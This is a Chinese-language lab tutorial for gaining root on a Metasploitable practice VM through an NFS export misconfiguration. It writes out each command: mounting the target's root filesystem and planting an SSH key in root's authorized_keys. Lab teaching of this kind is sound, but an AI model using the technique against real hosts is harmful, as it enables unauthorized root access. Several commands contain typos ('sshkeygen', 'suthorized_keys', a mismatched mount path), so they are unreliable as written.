Msftables之Linux NFS共享目錄配置漏洞


實驗目的

1、了解Metasploitables靶機系統漏洞;

2、學習使用Metasploit。

實驗原理

msftables之利用Linux NFS共享目錄配置漏洞滲透。

實驗內容

msftables之利用Linux NFS共享目錄配置漏洞滲透。

實驗環境描述

1、學生機與實驗室網絡直連;

2、VPC1、VPC2與實驗室網絡直連。

實驗步驟

1、打開靶機(登陸用戶名:msfadmin 密碼:msfadmin),查看靶機的IP地址。

命令:ifconfig

圖片描述

2、打開滲透機(登陸用戶名:root 密碼:toor)並查看其IP地址。

命令:ifconfig

圖片描述

3、在滲透機kali上查看靶機上的nfs服務是否開啟

命令:rpcinfo –p 192.168.10.100

圖片描述

4、在滲透機kali上查看靶機上設置的遠程共享目錄列表

命令:showmount –e 192.168.10.100

圖片描述

5、生成rsa公鑰

命令:sshkeygen

圖片描述

6、在滲透機 /tmp目錄下新建文件夾msftables,以備后續掛載需求

命令:mkdir /tmp/msftables

圖片描述

7、把靶機192.168.10.100的根目錄掛載到滲透機上新建的/tmp/mstables/目錄下;

命令:mount –o nolock –t nfs 192.168.10.100:/ /tmp/msftables/

圖片描述

8、把滲透機上生成的公鑰追加到靶機的authorized_keys下

命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/suthorized_keys

圖片描述

9、實現無密碼ssh登錄

命令:ssh root@192.168.10.100

圖片描述

10、 查看ip地址檢測是否已登錄到靶機

命令:ifconfig

圖片描述


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM